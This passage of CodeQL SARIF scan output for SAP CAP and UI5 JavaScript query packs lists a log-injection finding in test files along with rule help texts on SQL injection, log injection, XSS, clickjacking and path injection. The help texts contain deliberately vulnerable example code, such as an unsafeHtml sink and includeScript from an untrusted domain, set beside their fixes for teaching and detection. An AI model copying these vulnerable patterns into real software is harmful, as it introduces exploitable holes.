"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 32 - } - }, - "message" : { - "text" : "{ messageToPass }" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 
17, - "endColumn" : 30 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 7, - "startColumn" : 15, - "endColumn" : 43 - } - }, - "message" : { - "text" : "messageToPass" - } - } - }, { - "location" : { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 9, - "startColumn" : 32, - "endColumn" : 45 - } - }, - "message" : { - "text" : "messageToPass" - } - } - } ] - } ] - } ], - "relatedLocations" : [ { - "id" : 1, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 114 - }, - "region" : { - "startLine" : 6, - "startColumn" : 33, - "endColumn" : 36 - } - }, - "message" : { - "text" : "user-provided value" - } - }, { - "id" : 2, - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 122 - }, - "region" : { - "startLine" : 6, - "startColumn" : 29, - "endColumn" : 32 - } - }, - "message" : { - "text" : "user-provided value" - } - } ] - } ], - "newlineSequences" : [ "\r\n", "\n", "
", "
" ], - "columnKind" : "utf16CodeUnits", - "properties" : { - "codeqlConfigSummary" : { - "disableDefaultQueries" : false, - "queries" : [ { - "type" : "builtinSuite", - "uses" : "security-extended" - }, { - "type" : "localQuery", - "uses" : "./javascript/frameworks/ui5/src/codeql-suites/javascript-security-extended.qls" - }, { - "type" : "localQuery", - "uses" : "./javascript/frameworks/cap/src/codeql-suites/javascript-security-extended.qls" - } ] - }, - "metricResults" : [ { - "rule" : { - "id" : "js/summary/lines-of-code", - "index" : 101, - "toolComponent" : { - "index" : 3 - } - }, - "ruleId" : "js/summary/lines-of-code", - "value" : 2973 - }, { - "rule" : { - "id" : "js/summary/lines-of-user-code", - "index" : 102, - "toolComponent" : { - "index" : 3 - } - }, - "ruleId" : "js/summary/lines-of-user-code", - "value" : 2973, - "baseline" : 0 - } ], - "semmle.formatSpecifier" : "sarif-latest" - } - } ] -}{ - "$schema" : "https://json.schemastore.org/sarif-2.1.0.json", - "version" : "2.1.0", - "runs" : [ { - "tool" : { - "driver" : { - "name" : "CodeQL", - "organization" : "GitHub", - "semanticVersion" : "2.15.1", - "notifications" : [ { - "id" : "cli/expected-extracted-files/javascript", - "name" : "cli/expected-extracted-files/javascript", - "shortDescription" : { - "text" : "Expected extracted files" - }, - "fullDescription" : { - "text" : "Files appearing in the source archive that are expected to be extracted." - }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "expected-extracted-files", "telemetry" ], - "languageDisplayName" : "JavaScript" - } - }, { - "id" : "cli/expected-extracted-files/python", - "name" : "cli/expected-extracted-files/python", - "shortDescription" : { - "text" : "Expected extracted files" - }, - "fullDescription" : { - "text" : "Files appearing in the source archive that are expected to be extracted." 
- }, - "defaultConfiguration" : { - "enabled" : true - }, - "properties" : { - "tags" : [ "expected-extracted-files", "telemetry" ], - "languageDisplayName" : "Python" - } - } ], - "rules" : [ ] - }, - "extensions" : [ { - "name" : "advanced-security/javascript-sap-cap-queries", - "semanticVersion" : "0.2.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", - "rules" : [ { - "id" : "js/cap-sql-injection", - "name" : "js/cap-sql-injection", - "shortDescription" : { - "text" : "CQL query built from user-controlled sources" - }, - "fullDescription" : { - "text" : "Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) 
is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) 
is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = \nconst column = \nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building a CQL query from user-controlled sources is vulnerable to insertion of\n malicious code by the user.", - "id" : "js/cap-sql-injection", - "kind" : "path-problem", - "name" : "CQL query built from user-controlled sources", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "8.8" - } - }, { - "id" : "js/cap-log-injection", - "name" : "js/cap-log-injection", - "shortDescription" : { - "text" : "CAP Log injection" - }, - "fullDescription" : { - "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. 
It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n", - "markdown" : "# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging. 
It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n this.on ('submitOrder', async req => {\n const {book,quantity} = req.data\n const LOG = cds.log(\"nodejs\");\n LOG.info(\"test\" + book); // Log injection alert\n })\n\n return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n" - }, - "properties" : { - "tags" : [ "security" ], - "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", - "id" : "js/cap-log-injection", - "kind" : "path-problem", - "name" : "CAP Log injection", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - } ], - "locations" : [ { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/", - "description" : { - "text" : "The QL pack root directory." - } - }, { - "uri" : "file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/src/qlpack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "generated/extension-pack", - "semanticVersion" : "0.0.0", - "locations" : [ { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/", - "description" : { - "text" : "The QL pack root directory." 
- } - }, { - "uri" : "file:///home/runner/work/_temp/codeql_databases/javascript/temp/extension-pack/codeql-pack.yml", - "description" : { - "text" : "The QL pack definition file." - } - } ] - }, { - "name" : "advanced-security/javascript-sap-ui5-queries", - "semanticVersion" : "0.6.0+ffea18ba020c5590287d2f25b90825ce0c7cf055", - "rules" : [ { - "id" : "js/ui5-xss", - "name" : "js/ui5-xss", - "shortDescription" : { - "text" : "UI5 Client-side cross-site scripting" - }, - "fullDescription" : { - "text" : "Writing user input directly to a UI5 View allows for a cross-site scripting vulnerability." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. 
In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). 
Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control 
Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. 
In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). 
Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control 
Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Writing user input directly to a UI5 View allows for\n a cross-site scripting vulnerability.", - "id" : "js/ui5-xss", - "kind" : "path-problem", - "name" : "UI5 Client-side cross-site scripting", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/ui5-clickjacking", - "name" : "js/ui5-clickjacking", - "shortDescription" : { - "text" : "UI5 Clickjacking" - }, - "fullDescription" : { - "text" : "The absence of frame options allows for clickjacking." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). 
In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", - "markdown" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). 
In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-451" ], - "description" : "The absence of frame options allows for clickjacking.", - "id" : "js/ui5-clickjacking", - "kind" : "problem", - "name" : "UI5 Clickjacking", - "precision" : "medium", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, 
{ - "id" : "js/ui5-path-injection", - "name" : "js/ui5-path-injection", - "shortDescription" : { - "text" : "UI5 Path Injection" - }, - "fullDescription" : { - "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. 
If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", - "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. 
Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
